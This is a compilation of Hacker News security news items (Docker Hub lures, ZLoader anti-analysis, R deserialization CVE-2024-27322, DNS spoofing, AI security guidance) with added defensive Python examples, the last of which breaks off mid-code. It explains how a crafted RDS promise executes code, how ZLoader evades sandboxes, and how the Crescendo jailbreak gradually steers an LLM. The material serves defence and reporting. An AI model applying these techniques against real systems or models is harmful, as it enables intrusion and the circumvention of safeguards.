Millions of Malicious 'Imageless' Containers Planted on Docker Hub Over 5 Years
1.5.24
Virus
The Hacker News
Cybersecurity researchers have discovered multiple campaigns targeting Docker Hub by planting millions of malicious "imageless" containers over the past five years, once again underscoring how open-source registries could pave the way for supply chain attacks.
"Over four million of the repositories in Docker Hub are imageless and have no content except for the repository documentation," JFrog security researcher Andrey Polkovnichenko said in a report shared with The Hacker News.
What's more, the documentation has no connection whatsoever to the container. Instead, it's a web page that's designed to lure users into visiting phishing or malware-hosting websites.
Of the 4.6 million imageless Docker Hub repositories uncovered, 2.81 million of them are said to have been used as landing pages to redirect unsuspecting users to fraudulent sites as part of three broad campaigns -
Downloader (repositories created in the first half of 2021 and September 2023), which advertises links to purported pirated content or cheats for video games but either directly links to malicious sources or to a legitimate one that, in turn, contains JavaScript code that redirects to the malicious payload after 500 milliseconds.
E-book phishing (repositories created in mid-2021), which redirects users searching for e-books to a website ("rd.lesac.ru") that, in turn, urges them to enter their financial information to download the e-book.
Website (thousands of repositories created daily from April 2021 to October 2023), which contains a link to an online diary-hosting service called Penzu in some cases, or a harmless piece of text, suggesting that it could have been used during early testing phases.
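The triage a registry consumer can run against repositories like the ones described above, as an added example for this page rather than JFrog's own tooling. It assumes the JSON shapes of Docker Hub's public API (a repository document with a full_description field, and a tags listing with a count); the sample responses are constructed so the script runs offline, and the live fetch is kept in a separate function:

```python
"""Triage Docker Hub repositories for the 'imageless' lure pattern JFrog describes.
Added example, not JFrog's tooling. It works on the JSON shapes of Docker Hub's public
API (assumed: GET /v2/repositories/<ns>/<name>/ carries 'full_description' and
GET .../tags carries 'count'); the sample responses below are constructed so that the
script runs offline, and the live fetch is kept separate."""
import json
import re
import urllib.request
from urllib.parse import urlparse

HUB_API = "https://hub.docker.com/v2/repositories"            # assumed endpoint prefix
URL_RE = re.compile(r"https?://[^\s)\]>\"']+", re.IGNORECASE)
# Hosts a README can reasonably link to; anything else counts as an external lure link.
ALLOWED_HOSTS = {"hub.docker.com", "docs.docker.com", "github.com", "gitlab.com"}


def external_links(description):
    """Links in the README whose host is not on the allow-list."""
    hits = []
    for url in URL_RE.findall(description or ""):
        host = (urlparse(url).hostname or "").lower()
        if host and not any(host == h or host.endswith("." + h) for h in ALLOWED_HOSTS):
            hits.append(url)
    return hits


def classify(repo, tags):
    """Label one repository: 'has-image', 'imageless' or 'imageless-lure'."""
    links = external_links(repo.get("full_description", ""))
    if tags.get("count", 0) > 0:
        verdict = "has-image"                    # at least one tag, i.e. real content
    elif links:
        verdict = "imageless-lure"               # no image, README points off-platform
    else:
        verdict = "imageless"
    return {"repo": f"{repo['namespace']}/{repo['name']}", "verdict": verdict,
            "links": links, "last_updated": repo.get("last_updated")}


# Constructed sample responses in the API's shape (not real Hub data).
SAMPLES = [
    ({"namespace": "acme", "name": "web", "last_updated": "2024-03-01T10:00:00Z",
      "full_description": "Built from https://github.com/acme/web"},
     {"count": 4, "results": [{"name": "latest"}]}),
    ({"namespace": "gamez", "name": "cheat-pack", "last_updated": "2023-09-12T03:14:00Z",
      "full_description": "FREE cheats, download now: https://dl.example-lure.test/get?x=1"},
     {"count": 0, "results": []}),
    ({"namespace": "bob", "name": "notes", "last_updated": "2021-05-02T08:00:00Z",
      "full_description": "placeholder"},
     {"count": 0, "results": []}),
]


def triage(samples=SAMPLES):
    """Classify (repo, tags) pairs and return only the lure verdicts."""
    results = (classify(repo, tags) for repo, tags in samples)
    return [r for r in results if r["verdict"] == "imageless-lure"]


def fetch_pair(namespace, name):
    """Live variant (needs network): pull the two documents classify() consumes."""
    base = f"{HUB_API}/{namespace}/{name}"
    with urllib.request.urlopen(base + "/") as resp:
        repo = json.load(resp)
    with urllib.request.urlopen(base + "/tags?page_size=1") as resp:
        tags = json.load(resp)
    return repo, tags


if __name__ == "__main__":
    for hit in triage():
        print(hit["repo"], hit["verdict"], hit["links"])
```

A repository with no tags cannot be pulled, so its only function is whatever its README points at; treating "zero tags plus off-platform links" as a lure is the cheap filter, and the allow-list is the knob to tune per organisation.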
The payload delivered as part of the downloader campaign is designed to contact a command-and-control (C2) server and transmit system metadata, following which the server responds with a link to cracked software.
It's suspected that the attacks may be part of a larger malware operation, which could involve adware or monetization schemes that derive monetary benefit out of distributing third-party software.
On the other hand, the exact goal of the website cluster is currently unclear, with the campaign also propagated on sites that have a lax content moderation policy.
JFrog said it counted a total of 208,739 fake accounts that the threat actors used to create the malicious and unwanted repositories. Docker has since taken down all of them following responsible disclosure.
"The most concerning aspect of these three campaigns is that there is not a lot that users can do to protect themselves at the outset, other than exercising caution," Shachar Menashe, senior director of security research at JFrog, said in a statement shared with The Hacker News.
"We're essentially looking at a malware playground that in some cases has been three years in the making. These threat actors are highly motivated and are hiding behind the credibility of the Docker Hub name to lure victims."
With threat actors taking painstaking efforts to poison well-known utilities, as evidenced in the case of the XZ Utils compromise, it's imperative that developers exercise caution when downloading packages from open-source ecosystems.
"As Murphy's Law suggests, if something can be exploited by malware developers, it inevitably will be, so we expect that these campaigns can be found in more repositories than just Docker Hub," Menashe said.
ZLoader Malware Evolves with Anti-Analysis Trick from Zeus Banking Trojan
1.5.24
Virus
The Hacker News
The authors behind the resurfaced ZLoader malware have added a feature that was originally present in the Zeus banking trojan that it's based on, indicating that it's being actively developed.
"The latest version, 2.4.1.0, introduces a feature to prevent execution on machines that differ from the original infection," Zscaler ThreatLabz researcher Santiago Vicente said in a technical report. "A similar anti-analysis feature was present in the leaked ZeuS 2.X source code, but implemented differently."
ZLoader, also called Terdot, DELoader, or Silent Night, emerged after a nearly two-year hiatus around September 2023 following its takedown in early 2022.
A modular trojan with capabilities to load next-stage payloads, recent versions of the malware have added RSA encryption as well as updates to its domain generation algorithm (DGA).
The latest sign of ZLoader's evolution comes in the form of an anti-analysis feature that restricts the binary's execution to the infected machine.
The feature, present in artifacts with versions greater than 2.4.1.0, causes the malware to abruptly terminate if it is copied and executed on another system after the initial infection. This is accomplished by means of a Windows Registry check for a specific key and value.
"The Registry key and value are generated based on a hardcoded seed that is different for each sample," Vicente said.
"If the Registry key/value pair is manually created (or this check is patched), ZLoader will successfully inject itself into a new process. However, it will terminate again after executing only a few instructions. This is due to a secondary check in ZLoader's MZ header."
This means that ZLoader's execution will be stalled on a different machine unless the seed and MZ header values are set correctly and all the Registry and disk paths/names from the originally compromised system are replicated.
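A model of the host-binding behaviour described above, added here as an illustration rather than ZLoader's code: the actual derivation of the Registry key and value from the per-sample seed is not published, so SHA-256 and HMAC stand in for it, a dict stands in for HKCU, and the secondary MZ-header check is left out. The point it shows is why a sample plus an exported hive still dies in a sandbox, and what has to be replicated to revive it:

```python
"""Model of the host-binding check Zscaler describes in ZLoader 2.4.1.0+. Added
illustration, not ZLoader code: the real key/value derivation from the per-sample seed
is not published, so SHA-256/HMAC stand in for it, a dict stands in for HKCU, and the
secondary MZ-header check is left out."""
import hashlib
import hmac

SAMPLE_SEED = bytes.fromhex("9c0f3e21a7b45d88")     # hypothetical hardcoded per-sample seed


def marker_location(seed):
    """Key path and value name depend only on the seed, so they differ per sample."""
    h = hashlib.sha256(seed).digest()
    return f"HKCU\\Software\\{h[:8].hex()}", h[8:12].hex()


def fingerprint(seed, env):
    """Installation record: the paths/names of the original host, keyed by the seed."""
    msg = f"{env['hostname']}|{env['exe_path']}".encode()
    return hmac.new(seed, msg, hashlib.sha256).hexdigest()


def install(registry, seed, env):
    """First run on the victim: persist the installation record under the marker."""
    key, name = marker_location(seed)
    registry.setdefault(key, {})[name] = fingerprint(seed, env)


def gate(registry, seed, env):
    """Pre-injection check: continue only where the stored record matches this host."""
    key, name = marker_location(seed)
    stored = registry.get(key, {}).get(name, "")
    return hmac.compare_digest(stored, fingerprint(seed, env))


def run_on(env, registry, seed=SAMPLE_SEED):
    return "runs" if gate(registry, seed, env) else "terminates"


# Constructed scenario: infect VICTIM, then move the sample to an analysis VM.
VICTIM = {"hostname": "WS-0417", "exe_path": r"C:\Users\alice\AppData\Roaming\Xqzd\svchost.exe"}
SANDBOX = {"hostname": "ANALYSIS-VM", "exe_path": r"C:\samples\zloader.exe"}


def scenario():
    reg = {}
    install(reg, SAMPLE_SEED, VICTIM)
    copied = {k: dict(v) for k, v in reg.items()}     # analyst imports the victim's hive too
    return {
        "victim": run_on(VICTIM, reg),
        "sandbox_with_copied_hive": run_on(SANDBOX, copied),
        "sandbox_replicating_victim_paths": run_on(dict(VICTIM), copied),
    }


if __name__ == "__main__":
    for k, v in scenario().items():
        print(f"{k:34} {v}")
```

The practical consequence for analysts is the one the report states: detonating the binary in isolation is not enough, the environment it checks against has to be rebuilt (or the check patched out), and even then the MZ-header check has to be satisfied separately.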
Zscaler said the technique used by Zloader to store the installation information and avoid being run on a different host shares similarities with ZeuS version 2.0.8, albeit implemented in a different manner, which relied on a data structure called PeSettings to store the configuration instead of the Registry.
"In recent versions, ZLoader has adopted a stealthy approach to system infections," Vicente said. "This new anti-analysis technique makes ZLoader even more challenging to detect and analyze."
The development comes as threat actors are utilizing fraudulent websites hosted on popular legitimate platforms like Weebly to spread stealer malware and steal data via black hat search engine optimization (SEO) techniques.
"This catapults their fraudulent site to the top of a user's search results, increasing the likelihood of inadvertently selecting a malicious site and potentially infecting their system with malware," Zscaler researcher Kaivalya Khursale said.
A notable aspect of these campaigns is that the infection only proceeds to the payload delivery stage if the visit originates from search engines like Google, Bing, DuckDuckGo, Yahoo, or AOL, and if bogus sites are not accessed directly.
Over the past two months, email-based phishing campaigns have also been observed targeting organizations in the U.S., Turkey, Mauritius, Israel, Russia, and Croatia with Taskun malware, which acts as a facilitator for Agent Tesla, per findings from Veriti.
Ex-NSA Employee Sentenced to 22 Years for Trying to Sell U.S. Secrets to Russia
1.5.24
BigBrothers
The Hacker News
A former employee of the U.S. National Security Agency (NSA) has been sentenced to nearly 22 years (262 months) in prison for attempting to transfer classified documents to Russia.
"This sentence should serve as a stark warning to all those entrusted with protecting national defense information that there are consequences to betraying that trust," said FBI Director Christopher Wray.
Jareh Sebastian Dalke, 32, of Colorado Springs was employed as an Information Systems Security Designer between June 6 and July 1, 2022, during which time he had access to sensitive information.
Despite his short tenure at the intelligence agency, Dalke is said to have made contact with a person he thought was a Russian agent sometime between August and September of that year. In reality, the person was an undercover agent working for the Federal Bureau of Investigation (FBI).
To demonstrate his "legitimate access and willingness to share," he then emailed the purported Russian agent snippets of three top-secret National Defense Information (NDI) documents that were obtained during his employment using an encrypted email account.
Dalke, who demanded $85,000 in return for sharing all the files in his possession, claimed the information would be of value to Russia and told his contact that he would share more documents upon his return to Washington, D.C.
He was subsequently arrested on September 28, 2022, shortly after he transferred five files to the supposed Russian spy at Union Station in downtown Denver via a laptop computer. The defendant pleaded guilty to the crime in October 2023.
"As part of his plea agreement, Dalke admitted that he willfully transmitted files to the FBI online covert employee with the intent and reason to believe the information would be used to injure the United States and to benefit Russia," the U.S. Justice Department said.
U.S. Government Releases New AI Security Guidelines for Critical Infrastructure
30.4.24
AI
The Hacker News
The U.S. government has unveiled new security guidelines aimed at bolstering critical infrastructure against artificial intelligence (AI)-related threats.
"These guidelines are informed by the whole-of-government effort to assess AI risks across all sixteen critical infrastructure sectors, and address threats both to and from, and involving AI systems," the Department of Homeland Security (DHS) said Monday.
In addition, the agency said it's working to facilitate safe, responsible, and trustworthy use of the technology in a manner that does not infringe on individuals' privacy, civil rights, and civil liberties.
The new guidance concerns the use of AI to augment and scale attacks on critical infrastructure, adversarial manipulation of AI systems, and shortcomings in such tools that could result in unintended consequences, necessitating the need for transparency and secure by design practices to evaluate and mitigate AI risks.
Specifically, this spans four functions, govern, map, measure, and manage, applied across the whole AI lifecycle -
Govern: establish an organizational culture of AI risk management
Map: understand your individual AI use context and risk profile
Measure: develop systems to assess, analyze, and track AI risks
Manage: prioritize and act upon AI risks to safety and security
"Critical infrastructure owners and operators should account for their own sector-specific and context-specific use of AI when assessing AI risks and selecting appropriate mitigations," the agency said.
"Critical infrastructure owners and operators should understand where these dependencies on AI vendors exist and work to share and delineate mitigation responsibilities accordingly."
The development arrives weeks after the Five Eyes (FVEY) intelligence alliance comprising Australia, Canada, New Zealand, the U.K., and the U.S. released a cybersecurity information sheet noting the careful setup and configuration required for deploying AI systems.
"The rapid adoption, deployment, and use of AI capabilities can make them highly valuable targets for malicious cyber actors," the governments said.
"Actors, who have historically used data theft of sensitive information and intellectual property to advance their interests, may seek to co-opt deployed AI systems and apply them to malicious ends."
The recommended best practices include taking steps to secure the deployment environment, review the source of AI models and supply chain security, ensure a robust deployment environment architecture, harden deployment environment configurations, validate the AI system to ensure its integrity, protect model weights, enforce strict access controls, conduct external audits, and implement robust logging.
Earlier this month, the CERT Coordination Center (CERT/CC) detailed a shortcoming in the Keras 2 neural network library that could be exploited by an attacker to trojanize a popular AI model and redistribute it, effectively poisoning the supply chain of dependent applications.
Recent research has found AI systems to be vulnerable to a wide range of prompt injection attacks that induce the AI model to circumvent safety mechanisms and produce harmful outputs.
"Prompt injection attacks through poisoned content are a major security risk because an attacker who does this can potentially issue commands to the AI system as if they were the user," Microsoft noted in a recent report.
One such technique, dubbed Crescendo, has been described as a multiturn large language model (LLM) jailbreak, which, like Anthropic's many-shot jailbreaking, tricks the model into generating malicious content by "asking carefully crafted questions or prompts that gradually lead the LLM to a desired outcome, rather than asking for the goal all at once."
LLM jailbreak prompts have become popular among cybercriminals looking to craft effective phishing lures, even as nation-state actors have begun weaponizing generative AI to orchestrate espionage and influence operations.
Even more concerningly, research from the University of Illinois Urbana-Champaign has found that LLM agents can be put to use to autonomously exploit one-day vulnerabilities in real-world systems simply using their CVE descriptions and "hack websites, performing tasks as complex as blind database schema extraction and SQL injections without human feedback."
New U.K. Law Bans Default Passwords on Smart Devices Starting April 2024
30.4.24
BigBrothers
The Hacker News
The U.K. National Cyber Security Centre (NCSC) is calling on manufacturers of smart devices to comply with new legislation that prohibits them from using default passwords, effective April 29, 2024.
"The law, known as the Product Security and Telecommunications Infrastructure act (or PSTI act), will help consumers to choose smart devices that have been designed to provide ongoing protection against cyber attacks," the NCSC said.
To that end, manufacturers are required to not supply devices that use guessable default passwords, provide a point of contact to report security issues, and state the duration for which their devices are expected to receive important security updates.
Default passwords can not only be easily found online, they also act as a vector for threat actors to log in to devices for follow-on exploitation. That said, a unique default password is permissible under the law.
The law, which aims to enforce a set of minimum security standards across the board and prevent vulnerable devices from being corralled into a DDoS botnet like Mirai, applies to the following products that can be connected to the internet -
Smart speakers, smart TVs, and streaming devices
Smart doorbells, baby monitors, and security cameras
Cellular tablets, smartphones, and game consoles
Wearable fitness trackers (including smart watches)
Smart domestic appliances (such as light bulbs, plugs, kettles, thermostats, ovens, fridges, cleaners, and washing machines)
Companies that fail to adhere to the provisions of the PSTI act are liable to face recalls and monetary penalties, with fines of up to £10 million ($12.5 million) or 4% of their global annual revenues, whichever is higher.
The development makes the U.K. the first country in the world to outlaw default usernames and passwords from IoT devices. According to Cloudflare's DDoS threat report for Q1 2024, Mirai-based attacks continue to be prevalent despite the original botnet being taken down in 2016.
"Four out of every 100 HTTP DDoS attacks, and two out of every 100 L3/4 DDoS attacks are launched by a Mirai-variant botnet," Omer Yoachimik and Jorge Pacheco said. "The Mirai source code was made public, and over the years there have been many permutations of the original."
It also follows a $196 million fine issued by the U.S. Federal Communications Commission (FCC) against telecom carriers AT&T ($57 million), Sprint ($12 million), T-Mobile ($80 million), and Verizon ($47 million) for illegally sharing customers' real-time location data without their consent to aggregators like LocationSmart and Zumigo, who then sold the information to third-party location-based service providers.
"No one who signed up for a cell plan thought they were giving permission for their phone company to sell a detailed record of their movements to anyone with a credit card," U.S. Senator Ron Wyden, who revealed the practice in 2018, said in a statement.
Google Prevented 2.28 Million Malicious Apps from Reaching Play Store in 2023
30.4.24
OS
The Hacker News
Google on Monday revealed that
almost 200,000 app submissions to its Play Store for Android were either
rejected or remediated to address issues with access to sensitive data such as
location or SMS messages over the past year.
The tech giant also said it blocked 333,000 bad accounts from the app storefront in 2023 for attempting to distribute malware or for repeated policy violations.
"In 2023, we prevented 2.28 million policy-violating apps from being published on Google Play in part thanks to our investment in new and improved security features, policy updates, and advanced machine learning and app review processes," Google's Steve Kafka, Khawaja Shams, and Mohet Saxena said.
"To help safeguard user privacy at scale, we partnered with SDK providers to limit sensitive data access and sharing, enhancing the privacy posture for over 31 SDKs impacting 790K+ apps."
In comparison, Google fended off 1.43 million bad apps from being published to the Play Store in 2022, alongside banning 173,000 bad accounts over the same time period.
In addition, the Mountain View-based firm said it strengthened its developer onboarding and review processes, requiring them to furnish more identity information and complete a verification process when setting up their Play Console developer accounts.
This, the company noted, enables it to better understand the developer community and root out bad actors from gaming the system to propagate malicious apps.
The development comes as Google is taking a series of steps to secure the Android ecosystem. Last November, it moved the App Defense Alliance (ADA), which it launched in November 2019, under the Linux Foundation umbrella, with Meta and Microsoft joining as the founding steering members.
Around the same time, the company also rolled out real-time scanning at the code level to tackle novel Android malware and an "Independent security review" badge in the Play Store's Data safety section for VPN apps that have undergone a Mobile Application Security Assessment (MASA) audit.
On the user-facing side of things, Google has also taken the step of taking down approximately 1.5 million applications from the Play Store that do not target the most recent APIs.
Google's ongoing fight to tackle malicious actors on Android coincides with a lawsuit filed by the company in the U.S. against two China-based fraudsters who are alleged to have engaged in an international online consumer investment fraud scheme and tricked users into downloading fake apps from the Play Store and other sources and ultimately stealing their funds.
China-Linked 'Muddling Meerkat' Hijacks DNS to Map Internet on Global Scale
30.4.24
APT
The Hacker News
A previously undocumented cyber threat dubbed Muddling Meerkat has been observed undertaking sophisticated domain name system (DNS) activities in a likely effort to evade security measures and conduct reconnaissance of networks across the world since October 2019.
Cloud security firm Infoblox described the threat actor as likely affiliated with the People's Republic of China (PRC) with the ability to control the Great Firewall (GFW), which censors access to foreign websites and manipulates internet traffic to and from the country.
The moniker is a reference to the "bewildering" nature of their operations and the actor's abuse of DNS open resolvers – DNS servers that accept recursive queries from all IP addresses – to send queries from the Chinese IP space.
"Muddling Meerkat demonstrates a sophisticated understanding of DNS that is uncommon among threat actors today – clearly pointing out that DNS is a powerful weapon leveraged by adversaries," the company said in a report shared with The Hacker News.
More specifically, it entails triggering DNS queries for mail exchange (MX) and other record types to domains not owned by the actor but which reside under well-known top-level domains such as .com and .org.
Infoblox, which discovered the threat actor from anomalous DNS MX record requests that were sent to its recursive resolvers by customer devices, said it detected over 20 such domains -
4u[.]com, kb[.]com, oao[.]com, od[.]com, boxi[.]com, zc[.]com, s8[.]com, f4[.]com, b6[.]com, p3z[.]com, ob[.]com, eg[.]com, kok[.]com, gogo[.]com, aoa[.]com, zbo6[.]com, id[.]com, mv[.]com, nef[.]com, ntl[.]com, tv[.]com, 7ee[.]com, gb[.]com, tunk[.]org, q29[.]org, ni[.]com, tt[.]com, pr[.]com, dec[.]com
"Muddling Meerkat elicits a special kind of fake DNS MX record from the Great Firewall which has never been seen before," Dr. Renée Burton, vice president of threat intelligence for Infoblox, told The Hacker News. "For this to happen, Muddling Meerkat must have a relationship with the GFW operators."
"The target domains are the domain used in the queries, so it is not necessarily the target of an attack. It is the domain used to carry out the probe attack. These domains are not owned by Muddling Meerkat."
It's known that the GFW relies on what's called DNS spoofing and tampering to inject fake DNS responses containing random real IP addresses when a request matches a banned keyword or a blocked domain.
In other words, when a user attempts to search for a blocked keyword or phrase, the GFW blocks or redirects the website query in a manner that will prevent the user from accessing the requested information. This is achieved via techniques like DNS cache poisoning or IP address blocking.
This also means that if the GFW detects a query to a blocked website, the sophisticated tool injects a bogus DNS reply with an invalid IP address, or an IP address to a different domain, effectively corrupting the cache of recursive DNS servers located within its borders.
"The most remarkable feature of Muddling Meerkat is the presence of false MX record responses from Chinese IP addresses," Burton said. "This behavior [...] differs from the standard behavior of the GFW."
"These resolutions are sourced from Chinese IP addresses that do not host DNS services and contain false answers, consistent with the GFW. However, unlike the known behavior of the GFW, Muddling Meerkat MX responses include not IPv4 addresses but properly formatted MX resource records instead."
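What a resolver operator can look for, as an added example for this page and not Infoblox's detection logic: the two signals the write-up gives are MX queries aimed at the short, well-known apex domains listed above, and MX answers that arrive from addresses which are not the zone's authoritative servers. The resolver records, the authoritative-server table and the customer address ranges below are all constructed:

```python
"""Flag the resolver-side pattern Infoblox attributes to Muddling Meerkat. Added example
over constructed records, not Infoblox's detection. Two signals from the write-up: MX
queries aimed at the short, well-known apex domains listed in the report, and MX answers
arriving from addresses that are not the zone's authoritative servers."""
import ipaddress
from collections import Counter

# Apex domains named in the report (defanged in the text, usable here).
WATCHED_APEX = {"4u.com", "kb.com", "oao.com", "od.com", "boxi.com", "zc.com", "s8.com",
                "f4.com", "b6.com", "p3z.com", "ob.com", "eg.com", "kok.com", "gogo.com"}
# Constructed: where each zone's real authoritative servers live (illustrative addresses).
AUTH_NS = {"kb.com": {"192.0.2.10", "192.0.2.11"}, "gogo.com": {"198.51.100.5"}}
# Constructed: the resolver's own client ranges; anything else is open-resolver use.
CLIENT_NETS = [ipaddress.ip_network("10.0.0.0/8")]

# Constructed resolver records: who asked, what, and which address answered.
RECORDS = [
    {"client": "10.4.2.7", "qname": "mail.example.org", "qtype": "MX",
     "answer_src": "203.0.113.9", "rdata": "10 mx1.example.org"},      # ordinary mail lookup
    {"client": "10.4.2.7", "qname": "abc123.kb.com", "qtype": "MX",
     "answer_src": "192.0.2.10", "rdata": "NXDOMAIN"},                  # the real NS answered
    {"client": "10.4.2.9", "qname": "q7x.kb.com", "qtype": "MX",
     "answer_src": "198.18.7.42", "rdata": "10 mail.q7x.kb.com"},       # answer from a non-NS host
    {"client": "172.16.5.5", "qname": "zz9.gogo.com", "qtype": "MX",
     "answer_src": "198.18.9.1", "rdata": "5 mx.zz9.gogo.com"},         # same, from an outside client
    {"client": "10.4.2.9", "qname": "www.kb.com", "qtype": "A",
     "answer_src": "192.0.2.10", "rdata": "192.0.2.80"},
]


def apex_of(qname):
    """Last two labels; good enough for the .com/.org names in the report."""
    return ".".join(qname.rstrip(".").lower().split(".")[-2:])


def analyse(records=RECORDS):
    spoofed, per_apex = [], Counter()
    for r in records:
        apex = apex_of(r["qname"])
        if r["qtype"] != "MX" or apex not in WATCHED_APEX:
            continue
        per_apex[apex] += 1
        if r["answer_src"] not in AUTH_NS.get(apex, set()):   # MX answer from a non-authoritative IP
            spoofed.append((r["qname"], r["answer_src"], r["rdata"]))
    outsiders = sorted({r["client"] for r in records
                        if not any(ipaddress.ip_address(r["client"]) in n for n in CLIENT_NETS)})
    return {"spoofed_mx": spoofed, "mx_per_apex": dict(per_apex), "outside_clients": outsiders}


if __name__ == "__main__":
    for key, value in analyse().items():
        print(key, value)
```

The apex helper is deliberately naive (it would mis-split names under co.uk and similar); a real deployment would use a public-suffix list, and the authoritative-server table would be populated from the NS delegation rather than typed in.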
The exact motivation behind the multi-year activity is unclear, although it raised the possibility that it may be undertaken as part of an internet mapping effort or research of some kind.
"Muddling Meerkat is a Chinese nation-state actor performing deliberate and highly skilled DNS operations against global networks on an almost daily basis – and the full scope of their operation can not be seen in any one location," Burton said.
"Malware is easier than DNS in this sense – once you locate the malware, it is straightforward to understand it. Here, we know something is happening, but don't understand it fully. CISA, the FBI, and other agencies continue to warn of Chinese prepositioning operations that are undetected. We should be worried about anything we can't fully see or understand."
New R Programming Vulnerability Exposes Projects to Supply Chain Attacks
30.4.24
Vulnerability
The Hacker News
A security vulnerability has been discovered in the R programming language that could be exploited by a threat actor to create a malicious RDS (R Data Serialization) file such that it results in code execution when loaded and referenced.
The flaw, assigned the CVE identifier CVE-2024-27322 (CVSS score: 8.8), "involves the use of promise objects and lazy evaluation in R," AI application security company HiddenLayer said in a report shared with The Hacker News.
RDS, like pickle in Python, is a format used to serialize and save the state of data structures or objects in R, an open-source programming language used in statistical computing, data visualization, and machine learning.
This process of serialization – serialize() or saveRDS() – and deserialization – unserialize() and readRDS() – is also leveraged when saving and loading R packages.
The root cause behind CVE-2024-27322 lies in the fact that it could lead to arbitrary code execution when deserializing untrusted data, thus leaving users exposed to supply chain attacks through specially crafted R packages.
An attacker looking to weaponize the flaw could therefore take advantage of the fact that R packages leverage the RDS format to save and load data, causing automatic code execution when the package is decompressed and deserialized.
"R packages are vulnerable to this exploit and can, therefore, be used as part of a supply chain attack via package repositories," security researchers Kasimir Schulz and Kieran Evans said. "For an attacker to take over an R package, all they need to do is overwrite the rdx file with the maliciously crafted file, and when the package is loaded, it will automatically execute the code."
The security defect has been addressed in version 4.4.0 released on April 24, 2024, following responsible disclosure.
"An attacker can exploit this [flaw] by crafting a file in RDS format that contains a promise instruction setting the value to unbound_value and the expression to contain arbitrary code," HiddenLayer said. "Due to lazy evaluation, the expression will only be evaluated and run when the symbol associated with the RDS file is accessed."
"Therefore if this is simply an RDS file, when a user assigns it a symbol (variable) in order to work with it, the arbitrary code will be executed when the user references that symbol. If the object is compiled within an R package, the package can be added to an R repository such as CRAN, and the expression will be evaluated and the arbitrary code run when a user loads that package."
Update
The CERT Coordination Center (CERT/CC) has released an advisory for CVE-2024-27322, noting that the flaw could be exploited to achieve arbitrary code execution on the victim's target device via malicious RDS or rdx files.
"An attacker can create malicious .rds and .rdx files and use social engineering to distribute those files to execute arbitrary code on the victim's device," CERT/CC said. "Projects that use readRDS on untrusted files are also vulnerable to the attack."
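A static check one can run on an untrusted .rds before handing it to readRDS(): walk the serialized object graph and list every promise object together with the code it would run when forced. This is an added example written for this page, not R's deserializer or HiddenLayer's proof of concept. It follows the XDR layout in R's serialize.c for the common node types, refuses anything it does not understand (environments, bytecode, external pointers, ALTREP, long vectors) rather than skipping it, and the two fixtures at the bottom are hand-assembled in that layout rather than written by R:

```python
"""Static scan of an R RDS stream for promise objects (CVE-2024-27322 context). Added
example, not R's or HiddenLayer's code: it walks the XDR layout from R's serialize.c and
lists each PROMSXP with its deferred call. The fixtures are hand-built, not R output."""
import gzip
import struct

SYMSXP, LISTSXP, CLOSXP, PROMSXP, LANGSXP, CHARSXP, LGLSXP = 1, 2, 3, 5, 6, 9, 10
INTSXP, REALSXP, STRSXP, DOTSXP, VECSXP, EXPRSXP = 13, 14, 16, 17, 19, 20
REFSXP, NILVALUE_SXP, GLOBALENV_SXP, UNBOUNDVALUE_SXP, MISSINGARG_SXP = 255, 254, 253, 252, 251
SINGLETONS = {NILVALUE_SXP, GLOBALENV_SXP, UNBOUNDVALUE_SXP, MISSINGARG_SXP, 250, 242, 241}
HAS_ATTR, HAS_TAG = 1 << 9, 1 << 10            # bits packed into every item's flags word


class RdsWalker:
    def __init__(self, data):
        if data[:2] == b"\x1f\x8b":                # saveRDS() gzips by default
            data = gzip.decompress(data)
        if data[:2] != b"X\n":
            raise ValueError("only XDR ('X\\n') streams are handled")
        self.buf, self.pos, self.refs, self.promises = data, 2, [], []
        version = self.read_int()
        self.read_int(); self.read_int()           # writer version, minimal reader version
        if version == 3:
            self.read_bytes(self.read_int())       # native encoding name
        elif version != 2:
            raise ValueError(f"unsupported serialization version {version}")
        self.root = self.read_item()

    def read_int(self):
        self.pos += 4
        return struct.unpack_from(">i", self.buf, self.pos - 4)[0]

    def read_bytes(self, n):
        self.pos += n
        return self.buf[self.pos - n:self.pos]

    def read_len(self):
        n = self.read_int()
        if n < 0:                                  # -1 announces a long vector; not handled
            raise ValueError("long vectors unsupported")
        return n

    def read_item(self):
        flags = self.read_int()
        t, has_attr, has_tag = flags & 0xFF, bool(flags & HAS_ATTR), bool(flags & HAS_TAG)
        if t in SINGLETONS:
            return ("special", t)
        if t == REFSXP:                            # back-reference to an earlier symbol, 1-based
            return self.refs[((flags >> 8) or self.read_int()) - 1]
        if t == SYMSXP:
            node = ("sym", self.read_item()[1])    # PRINTNAME is a CHARSXP
            self.refs.append(node)
            return node
        if t in (LISTSXP, LANGSXP, CLOSXP, PROMSXP, DOTSXP):
            if has_attr:
                self.read_item()
            tag = self.read_item() if has_tag else None      # promise: its environment
            car, cdr = self.read_item(), self.read_item()    # promise: value, then code
            node = ("pair", t, tag, car, cdr)
            if t == PROMSXP:
                self.promises.append(node)
            return node
        if t == CHARSXP:
            n = self.read_int()
            node = ("char", None if n == -1 else self.read_bytes(n).decode("utf-8", "replace"))
        elif t in (LGLSXP, INTSXP, REALSXP):       # XDR: big-endian 4-byte ints, 8-byte doubles
            n, (code, size) = self.read_len(), (("d", 8) if t == REALSXP else ("i", 4))
            node = ("num", list(struct.unpack(f">{n}{code}", self.read_bytes(n * size))))
        elif t == STRSXP:
            node = ("str", [self.read_item()[1] for _ in range(self.read_len())])
        elif t in (VECSXP, EXPRSXP):
            node = ("vec", [self.read_item() for _ in range(self.read_len())])
        else:                                      # environments, bytecode, extptr, ALTREP...
            raise ValueError(f"unsupported SEXP type {t} at offset {self.pos - 4}")
        if has_attr:
            self.read_item()                       # attributes pairlist, not needed here
        return node


def render(node):
    """Render a node roughly as R source, enough to eyeball a payload."""
    kind = node[0]
    if kind in ("sym", "char"):
        return node[1]
    if kind in ("str", "num"):
        return ", ".join(repr(v) for v in node[1])
    if kind == "special":
        names = {NILVALUE_SXP: "NULL", UNBOUNDVALUE_SXP: "<unbound>", GLOBALENV_SXP: "<globalenv>"}
        return names.get(node[1], f"<special {node[1]}>")
    if kind == "pair" and node[1] == LANGSXP:      # a call: car is the function, cdr the args
        args, rest = [], node[4]
        while rest[0] == "pair":
            args.append(render(rest[3]))
            rest = rest[4]
        return f"{render(node[3])}({', '.join(args)})"
    return f"<{kind}>"


def scan_rds(data):
    """One dict per promise found, with its environment, value and deferred code."""
    return [{"env": render(p[2]) if p[2] else "NULL", "value": render(p[3]), "expr": render(p[4])}
            for p in RdsWalker(data).promises]


def _xdr(*ints):
    return struct.pack(f">{len(ints)}i", *ints)


def _char(s):                                      # CHARSXP: flags with ASCII level bit, length, bytes
    return _xdr(0x40009, len(s)) + s


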